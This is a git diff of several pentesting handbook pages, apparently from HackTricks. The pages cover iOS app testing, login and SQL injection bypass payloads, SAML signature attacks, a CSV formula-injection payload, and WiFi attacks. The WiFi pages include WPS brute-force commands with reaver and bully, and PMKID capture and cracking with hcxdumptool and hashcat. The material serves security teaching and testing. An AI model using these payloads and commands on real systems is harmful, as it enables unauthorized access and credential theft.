In the open source bitcoin wallet app, [Bither](https://github.com/bither/bither-ios), you'll see that it's possible to configure a PIN to lock the UI.\ In the open source bitcoin wallet app, [Bither](https://github.com/bither/bither-ios), you'll see that it's possible to configure a PIN to lock the UI.\
This is PIN is stored in the file `net.bither.plist` inside the **pin_code** **key**.\ This is PIN is stored in the file `net.bither.plist` inside the **pin\_code** **key**.\
If you clear this key from that plist in the backup and restores the backup, you will be able to access the wallet. If you clear this key from that plist in the backup and restores the backup, you will be able to access the wallet.
## Testing Memory for Sensitive Data ## Testing Memory for Sensitive Data
@ -753,7 +753,7 @@ The **fingerprint ID** sensor is operated by the [SecureEnclave security coproce
Developers have two options for incorporating Touch ID/Face ID authentication: Developers have two options for incorporating Touch ID/Face ID authentication:
* `LocalAuthentication.framework` is a high-level API that can be used to **authenticate the user via Touch ID**. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful. * `LocalAuthentication.framework` is a high-level API that can be used to **authenticate the user via Touch ID**. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful.
* `Security.framework` is a lower level API to access [keychain services](https://developer.apple.com/documentation/security/keychain_services). This is a secure option if your app needs to **protect some secret data with biometric authentication**, since the access control is managed on a system-level and can not easily be bypassed. `Security.framework` has a C API, but there are several [open source wrappers available](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id), making access to the keychain as simple as to NSUserDefaults. * `Security.framework` is a lower level API to access [keychain services](https://developer.apple.com/documentation/security/keychain\_services). This is a secure option if your app needs to **protect some secret data with biometric authentication**, since the access control is managed on a system-level and can not easily be bypassed. `Security.framework` has a C API, but there are several [open source wrappers available](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id), making access to the keychain as simple as to NSUserDefaults.
{% hint style="danger" %} {% hint style="danger" %}
Please be aware that using either the `LocalAuthentication.framework` or the `Security.framework`, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. See [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM) for more details. Please be aware that using either the `LocalAuthentication.framework` or the `Security.framework`, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. See [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM) for more details.
@ -774,7 +774,7 @@ The **iOS keychain APIs can (and should) be used to implement local authenticati
The keychain allows saving items with the special `SecAccessControl` attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters). The keychain allows saving items with the special `SecAccessControl` attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters).
In the following example we will save the string "test_strong_password" to the keychain. The string can be accessed only on the current device while the passcode is set (`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly` parameter) and after Touch ID authentication for the currently enrolled fingers only (`SecAccessControlCreateFlags.biometryCurrentSet` parameter): In the following example we will save the string "test\_strong\_password" to the keychain. The string can be accessed only on the current device while the passcode is set (`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly` parameter) and after Touch ID authentication for the currently enrolled fingers only (`SecAccessControlCreateFlags.biometryCurrentSet` parameter):
{% tabs %} {% tabs %}
{% tab title="Swift" %} {% tab title="Swift" %}
@ -990,7 +990,7 @@ In order to check this issue using Burp, after trusting Burp CA in the iPhone, y
### Certificate Pinning ### Certificate Pinning
If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\ If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\
In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) **\*\*or install \[**Burp Mobile Assistant_\*]\(_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)\*\*\* In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) \*\*\*\*or install \[\*\*Burp Mobile Assistant\_\*]\(\_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)/)\*\*\*
You can also use **objection's** `ios sslpinning disable` You can also use **objection's** `ios sslpinning disable`
@ -998,7 +998,7 @@ You can also use **objection's** `ios sslpinning disable`
* In **`/System/Library`** you can find the frameworks installed in the phone used by system applications * In **`/System/Library`** you can find the frameworks installed in the phone used by system applications
* The applications installed by the user from the App Store are located inside **`/User/Applications`** * The applications installed by the user from the App Store are located inside **`/User/Applications`**
* And the **`/User/Library`** contains data saved by the user level applications * And the **`/User/Library`** contains data saved by the user level applications
* You can access **`/User/Library/Notes/notes.sqlite`** to read the notes saved inside the application. * You can access **`/User/Library/Notes/notes.sqlite`** to read the notes saved inside the application.
* Inside the folder of an installed application (**`/User/Applications/<APP ID>/`**) you can find some interesting files: * Inside the folder of an installed application (**`/User/Applications/<APP ID>/`**) you can find some interesting files:
* **`iTunesArtwork`**: The icon used by the app * **`iTunesArtwork`**: The icon used by the app
@ -1041,6 +1041,6 @@ You can find the **libraries used by an application** by running **`otool`** aga
* [https://www.slideshare.net/RyanISI/ios-appsecurityminicourse](https://www.slideshare.net/RyanISI/ios-appsecurityminicourse) * [https://www.slideshare.net/RyanISI/ios-appsecurityminicourse](https://www.slideshare.net/RyanISI/ios-appsecurityminicourse)
* [https://github.com/prateek147/DVIA](https://github.com/prateek147/DVIA) * [https://github.com/prateek147/DVIA](https://github.com/prateek147/DVIA)
* [https://github.com/OWASP/MSTG-Hacking-Playground%20](https://github.com/OWASP/MSTG-Hacking-Playground) * [https://github.com/OWASP/MSTG-Hacking-Playground%20](https://github.com/OWASP/MSTG-Hacking-Playground)
* OWASP iGoat [_https://github.com/OWASP/igoat_](https://github.com/OWASP/igoat) <<< Objective-C version [_https://github.com/OWASP/iGoat-Swift_](https://github.com/OWASP/iGoat-Swift) <<< Swift version * OWASP iGoat [_https://github.com/OWASP/igoat_](https://github.com/OWASP/igoat) <<< Objective-C version [_https://github.com/OWASP/iGoat-Swift_](https://github.com/OWASP/iGoat-Swift) <<< Swift version
* [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS) * [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS)
* [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2) * [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2)

View file

@ -68,7 +68,7 @@ If at this point you haven't found any interesting vulnerability you **may need
Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/). Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/).
Specially in Windows you could need some help to **avoid antiviruses**: **\*\*\[**Check this page**]\(windows/av-bypass.md)**.\*\* Specially in Windows you could need some help to **avoid antiviruses**: **\*\*\[Check this page]\(windows/av-bypass.md)**.\*\*
## 8- Inside ## 8- Inside
@ -140,6 +140,6 @@ Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to
* [**CBC-MAC**](cryptography/cipher-block-chaining-cbc-mac-priv.md) * [**CBC-MAC**](cryptography/cipher-block-chaining-cbc-mac-priv.md)
* [**Padding Oracle**](cryptography/padding-oracle-priv.md) * [**Padding Oracle**](cryptography/padding-oracle-priv.md)
![](<.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1).png>) ![](<.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (1).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

View file

@ -4,7 +4,7 @@
First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example: First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example:
![](<../../../.gitbook/assets/image (389).png>) ![](<../../../.gitbook/assets/image (389) (1).png>)
In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties. In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties.

View file

@ -41,7 +41,7 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`** It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2).png>) ![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1).png>)
### More ### More

View file

@ -7,7 +7,10 @@ If you find a login page, here you can find some techniques to try to bypass it:
* Check for **comments** inside the page (scroll down and to the right?) * Check for **comments** inside the page (scroll down and to the right?)
* Check if you can **directly access the restricted pages** * Check if you can **directly access the restricted pages**
* Check to **not send the parameters** (do not send any or only 1) * Check to **not send the parameters** (do not send any or only 1)
* Check the **PHP comparisons error:** _user\[]=a\&pwd=b_ , _user=a\&pwd\[]=b_ , _user\[]=a\&pwd\[]=b_ * Check the **PHP comparisons error:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
* Check nodejs potential parsing error (read [**this**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
* Nodejs will transform that payload to a query similar to the following one: `SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `**`password=password=1`**`;` which makes the password bit to be always true.
* Adding `"stringifyObjects":true` option when calling `mysql.createConnection` will eventually block all unexpected behaviours when `Object` is passed in the parameter.
* Check credentials: * Check credentials:
* [**Default credentials**](../../brute-force.md#default-credentials) of the technology/platform used * [**Default credentials**](../../brute-force.md#default-credentials) of the technology/platform used
* **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords). * **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords).
@ -26,13 +29,13 @@ In the following page you can find a **custom list to try to bypass login** via
### No SQL Injection authentication bypass ### No SQL Injection authentication bypass
[Here you can find several tricks to bypass the login via **No SQL Injections.**](../nosql-injection.md#basic-authentication-bypass)**** [Here you can find several tricks to bypass the login via **No SQL Injections**](../nosql-injection.md#basic-authentication-bypass)**.**
As the NoSQL Injections requires to change the parameters value, you will need to test them manually. As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
### XPath Injection authentication bypass ### XPath Injection authentication bypass
[Here you can find several tricks to bypass the login via **XPath Injection.**](../xpath-injection.md#authentication-bypass)**** [Here you can find several tricks to bypass the login via **XPath Injection.**](../xpath-injection.md#authentication-bypass)
``` ```
' or '1'='1 ' or '1'='1
@ -52,7 +55,7 @@ admin' or '1'='2
### LDAP Injection authentication bypass ### LDAP Injection authentication bypass
[Here you can find several tricks to bypass the login via **LDAP Injection.**](../ldap-injection.md#login-bypass)**** [Here you can find several tricks to bypass the login via **LDAP Injection.**](../ldap-injection.md#login-bypass)
``` ```
* *

View file

@ -8,7 +8,7 @@
## Attacks Graphic ## Attacks Graphic
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (4).png>) ![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (3).png>)
## Tool ## Tool
@ -193,13 +193,13 @@ Here you can find a **POC** to check for this kind of vulnerabilities, in the ha
You can also use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) to generate the POC from a SAML request to test for possible XSLT vulnerabilities. You can also use the Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) to generate the POC from a SAML request to test for possible XSLT vulnerabilities.
## XML Signature Exclusion <a href="xml-signature-exclusion" id="xml-signature-exclusion"></a> ## XML Signature Exclusion <a href="#xml-signature-exclusion" id="xml-signature-exclusion"></a>
Signature Exclusion is used to test how the SAML implementation behaves when there is **no Signature elemen**t. When a Signature element is **absent** the **signature validation step may get skipped entirely**. If the Signature isnt validated, then any of the contents that would typically be signed may be tampered with by an attacker. Signature Exclusion is used to test how the SAML implementation behaves when there is **no Signature elemen**t. When a Signature element is **absent** the **signature validation step may get skipped entirely**. If the Signature isnt validated, then any of the contents that would typically be signed may be tampered with by an attacker.
![](<../../.gitbook/assets/image (547).png>) ![](<../../.gitbook/assets/image (547).png>)
### Tool <a href="xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a> ### Tool <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
Signature exclusion begins with intercepting the SAML Response then clicking `Remove Signatures`. In doing so **all** Signature elements are removed. Signature exclusion begins with intercepting the SAML Response then clicking `Remove Signatures`. In doing so **all** Signature elements are removed.
@ -207,11 +207,11 @@ Signature exclusion begins with intercepting the SAML Response then clicking `Re
With the signatures removed, allow the request to proceed to the target. If the Signature isnt required by the Service With the signatures removed, allow the request to proceed to the target. If the Signature isnt required by the Service
## Certificate Faking <a href="certificate-faking" id="certificate-faking"></a> ## Certificate Faking <a href="#certificate-faking" id="certificate-faking"></a>
Certificate faking is the process of testing whether or not the Service Provider **verifies that a trusted Identity Provider signed the SAML Message.** The trust relationship between SP and IdP is established and **should be verified** each time a SAML Message is received. What this comes down to is using a **self-signed** certificate to sign the SAML Response or Assertion. Certificate faking is the process of testing whether or not the Service Provider **verifies that a trusted Identity Provider signed the SAML Message.** The trust relationship between SP and IdP is established and **should be verified** each time a SAML Message is received. What this comes down to is using a **self-signed** certificate to sign the SAML Response or Assertion.
### Tool <a href="certificate-faking-how-to" id="certificate-faking-how-to"></a> ### Tool <a href="#certificate-faking-how-to" id="certificate-faking-how-to"></a>
The Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) is going to be used.\ The Burp extension [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) is going to be used.\
To fake a certificate, begin by intercepting the SAML Response.\ To fake a certificate, begin by intercepting the SAML Response.\
@ -229,7 +229,7 @@ Doing so generates a self-signed clone of the original certificate. Now its t
After signing the message with the self-signed cert, send it on its way. If we authenticate, we know that we can sign our SAML Messages. The ability to sign our SAML Messages means we can change values in the Assertion and they will be accepted by the Service Provider. After signing the message with the self-signed cert, send it on its way. If we authenticate, we know that we can sign our SAML Messages. The ability to sign our SAML Messages means we can change values in the Assertion and they will be accepted by the Service Provider.
## Token Recipient Confusion / Service Provider Target Confusion <a href="token-recipient-confusion" id="token-recipient-confusion"></a> ## Token Recipient Confusion / Service Provider Target Confusion <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
Token Recipient Confusion / Service Provider Target CONfusion **tests whether or not the Service Provider validates the Recipient**. This means, that **if the response was meant to a different Service Provide**r, the **current** Service Provider should notice it and **reject the authentication**.\ Token Recipient Confusion / Service Provider Target CONfusion **tests whether or not the Service Provider validates the Recipient**. This means, that **if the response was meant to a different Service Provide**r, the **current** Service Provider should notice it and **reject the authentication**.\
The **Recipient** field is an attribute of the **SubjectConfirmationData** element, which is a child of the Subject element in a SAML Response. The **Recipient** field is an attribute of the **SubjectConfirmationData** element, which is a child of the Subject element in a SAML Response.
@ -238,7 +238,7 @@ The **Recipient** field is an attribute of the **SubjectConfirmationData** eleme
The Recipient attribute found on the **SubjectConfirmationData element is a URL that specifies the location to which the Assertion must be delivered**. If the Recipient is a different Service Provider than the one who receives it, the Assertion should not be accepted. The Recipient attribute found on the **SubjectConfirmationData element is a URL that specifies the location to which the Assertion must be delivered**. If the Recipient is a different Service Provider than the one who receives it, the Assertion should not be accepted.
### How-to <a href="token-recipient-confusion-how-to" id="token-recipient-confusion-how-to"></a> ### How-to <a href="#token-recipient-confusion-how-to" id="token-recipient-confusion-how-to"></a>
SAML Token Recipient Confusion (SAML-TRC) has a few prequisite conditions in order for us to attempt exploitation. First, we **need** to have a **legitimate account on a Service Provider**. Second, **SP-Target must accept tokens issued by the same Identity Provider that services SP-Legit**. SAML Token Recipient Confusion (SAML-TRC) has a few prequisite conditions in order for us to attempt exploitation. First, we **need** to have a **legitimate account on a Service Provider**. Second, **SP-Target must accept tokens issued by the same Identity Provider that services SP-Legit**.

View file

@ -199,6 +199,15 @@ On the next examples we are going to retrieve the name of all the databases, the
_There is a different way to discover this data on every different database, but it's always the same methodology._ _There is a different way to discover this data on every different database, but it's always the same methodology._
## Exploiting Hidden Union Based
If you can see the output of the query but you can't achieve a union based injection, you are dealing with a hidden union based injection.
In this situation you end up with a blind injection. To turn the blind injection to a union based one, you need to extract the query being executed on the backend.
You can do so by use of the blind injection and the default tables of your target DBMS. To learn about those default tables read the documentation of your target DBMS.
After extracting the query, you need to adjust your payload accordingly, closing the original query safely. Then append a union query to your payload and start exploiting the newly obtained union based injection.
Complete Article: https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f
## Exploiting Error based ## Exploiting Error based
If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.\ If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.\

View file

@ -64,8 +64,8 @@ nmap -T4 -sY -n --open -Pn <IP/range>
Here you can find a nice guide of all the well known Wifi attacks at the time of the writing: Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:
{% content-ref url="wifi-attacks/" %} {% content-ref url="../pentesting-wifi/" %}
[wifi-attacks](wifi-attacks/) [pentesting-wifi](../pentesting-wifi/)
{% endcontent-ref %} {% endcontent-ref %}
## Discovering hosts from the inside ## Discovering hosts from the inside

View file

@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
If you see an error like the following one: If you see an error like the following one:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2).png>) ![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2).png>)
It means that the server **didn't receive the correct domain name** inside the Host header.\ It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
@ -336,7 +336,7 @@ You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/
![](<../../.gitbook/assets/image (183).png>) ![](<../../.gitbook/assets/image (183).png>)
Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf) Original research: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
You can also use **metasploit**: `use scanner/http/iis_shortname_scanner` You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`

View file

@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall> </methodCall>
``` ```
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2).png>) ![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1).png>)
![](<../../.gitbook/assets/image (102).png>) ![](<../../.gitbook/assets/image (102).png>)

View file

@ -1,4 +1,4 @@
# Wifi Attacks # Pentesting Wifi
## Wifi basic commands ## Wifi basic commands
@ -49,11 +49,34 @@ docker run \
From: [https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux](https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux) From: [https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux](https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux)
## Resume attacks ### wifiphisher
It can perform Evil Twin, KARMA, and Known Beacons attacks and then use a phishing template to manage to obtain the network real password or capture social network credentials.
```bash
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies
```
### [Wifite2](https://github.com/derv82/wifite2)
This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically:
* Set the interface in monitor mode
* Scan for possible networks - And let you select the victim(s)
* If WEP - Launch WEP attacks
* If WPA-PSK
* If WPS: Pixie dust attack and the bruteforce attack (be careful the brute-force attack could take a long time). Notice that it doesn't try null PIN or database/generated PINs.
* Try to capture the PMKID from the AP to crack it
* Try to deauthenticate clients of the AP to capture a handshake
* If PMKID or Handshake, try to bruteforce using top5000 passwords.
## Attacks Summary
* **DoS**&#x20; * **DoS**&#x20;
* Deauthentication/disassociation -- Disconnect everyone (or a specific ESSID/Client) * Deauthentication/disassociation -- Disconnect everyone (or a specific ESSID/Client)
* Random fake APs -- Hide nets, possible crash scanners) * Random fake APs -- Hide nets, possible crash scanners
* Overload AP -- Try to kill the AP (usually not very useful) * Overload AP -- Try to kill the AP (usually not very useful)
* WIDS -- Play with the IDS * WIDS -- Play with the IDS
* TKIP, EAPOL -- Some specific attacks to DoS some APs * TKIP, EAPOL -- Some specific attacks to DoS some APs
@ -70,7 +93,7 @@ From: [https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux](https://g
* **Open** Evil Twin \[+ DoS] -- Useful to capture captive portal creds and/or perform LAN attacks * **Open** Evil Twin \[+ DoS] -- Useful to capture captive portal creds and/or perform LAN attacks
* **WPA-PSK** Evil Twin -- Useful to network attacks if you know the password * **WPA-PSK** Evil Twin -- Useful to network attacks if you know the password
* **WPA-MGT** -- Useful to capture company credentials * **WPA-MGT** -- Useful to capture company credentials
* **MANA**, **Loud MANA**, **Known beacon** * **KARMA, MANA**, **Loud MANA**, **Known beacon**
* **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks * **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks
* **+ WPA** -- Useful to capture WPA handshakes * **+ WPA** -- Useful to capture WPA handshakes
@ -186,7 +209,7 @@ A simple packet fuzzer with multiple packet sources and a nice set of modifiers.
_**Airgeddon**_ offers most of the attacks proposed in the previous comments: _**Airgeddon**_ offers most of the attacks proposed in the previous comments:
![](<../../../.gitbook/assets/image (126).png>) ![](<../../.gitbook/assets/image (126).png>)
## WPS ## WPS
@ -198,14 +221,15 @@ WPS uses a 8 length PIN to allow a user to connect to the network, but it's firs
There are 2 main tools to perform this action: Reaver and Bully. There are 2 main tools to perform this action: Reaver and Bully.
* Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. * **Reaver** has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
* Bully is a new implementation of the WPS brute force attack, written in C. It has several advantages over the original reaver code: fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture. * **Bully** is a **new implementation** of the WPS brute force attack, written in C. It has several advantages over the original reaver code: fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options.
Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success. This attack takes advantage of a **weakness in the eight-digit WPS PIN code**; because of this issue, the protocol **discloses information about the PINs first four digits**, and the **last** digit works as a **checksum**, which makes brute forcing the WPS AP easy.\
Note that some devices include **brute-force protections**, which usually **block MAC addresses** that repeatedly try to attack. In that case, the complexity of this attack increases, because youd have to **rotate MAC** addresses while testing PINs.
If the WPS valid code is found, both Bully and Reaver will use it to discover the WPA/WPA2 PSK used to protect the network, so you will be able to connect anytime you need it. If the WPS valid code is found, both Bully and Reaver will use it to discover the WPA/WPA2 PSK used to protect the network, so you will be able to connect anytime you need it.
``` ```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3 bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
``` ```
@ -242,7 +266,7 @@ Some really bad implementations allowed the Null PIN to connect (very weird also
All the proposed WPS attacks can be easily performed using _**airgeddon.**_ All the proposed WPS attacks can be easily performed using _**airgeddon.**_
![](<../../../.gitbook/assets/image (201).png>) ![](<../../.gitbook/assets/image (201) (1).png>)
* 5 and 6 lets you try **your custom PIN** (if you have any) * 5 and 6 lets you try **your custom PIN** (if you have any)
* 7 and 8 perform the **Pixie Dust attack** * 7 and 8 perform the **Pixie Dust attack**
@ -254,13 +278,13 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_
So broken and disappeared that I am not going to talk about it. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options. So broken and disappeared that I am not going to talk about it. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
![](<../../../.gitbook/assets/image (125).png>) ![](<../../.gitbook/assets/image (125).png>)
## WPA/WPA2 PSK ## WPA/WPA2 PSK
### PMKID ### PMKID
In 2018 hashcat authors [disclosed](https://hashcat.net/forum/thread-7717.html) a new type of attack which not only relies **on one single packet**, but it doesnt require any clients to be connected to our target AP or, if clients are connected, it doesnt require us to send deauth frames to them, theres no interaction between the attacker and client stations, but just between the attacker and the AP, interaction which, if the router is vulnerable, is almost immediate! In 2018 hashcat authors [disclosed](https://hashcat.net/forum/thread-7717.html) a new type of attack which not only relies **on one single packet**, but it doesnt require any clients to be connected to our target AP but just communication between the attacker and the AP.
It turns out that **a lot** of modern routers append an **optional field** at the end of the **first EAPOL** frame sent by the AP itself when someone is associating, the so called `Robust Security Network`, which includes something called `PMKID` It turns out that **a lot** of modern routers append an **optional field** at the end of the **first EAPOL** frame sent by the AP itself when someone is associating, the so called `Robust Security Network`, which includes something called `PMKID`
@ -275,7 +299,7 @@ Description obtained from [here](https://www.evilsocket.net/2019/02/13/Pwning-Wi
To **gather** this information and **bruteforce** locally the password you can do: To **gather** this information and **bruteforce** locally the password you can do:
``` ```bash
airmon-ng check kill airmon-ng check kill
airmon-ng start wlan0 airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
@ -290,7 +314,7 @@ hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
The **PMKIDs captured** will be shown in the **console** and also **saved** inside _ **/tmp/attack.pcap**_\ The **PMKIDs captured** will be shown in the **console** and also **saved** inside _ **/tmp/attack.pcap**_\
Now, convert the capture to **hashcat/john** format and crack it: Now, convert the capture to **hashcat/john** format and crack it:
``` ```bash
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
@ -301,7 +325,7 @@ __If yours **only** contains **3 parts**, then, it is **invalid** (the PMKID cap
Note that `hcxdumptool` **also capture handshakes** (something like this will appear: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**). You could **transform** the **handshakes** to **hashcat**/**john** format using `cap2hccapx` Note that `hcxdumptool` **also capture handshakes** (something like this will appear: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**). You could **transform** the **handshakes** to **hashcat**/**john** format using `cap2hccapx`
``` ```bash
tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"] cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john hccap2john pmkid.hccapx > handshake.john
@ -330,7 +354,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ
Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening: Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
![](<../../../.gitbook/assets/image (172) (1) (1).png>) ![](<../../.gitbook/assets/image (172) (1) (1).png>)
Once the handshake is captured you can **crack** it with `aircrack-ng`: Once the handshake is captured you can **crack** it with `aircrack-ng`:
@ -395,7 +419,7 @@ Reading [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/htm
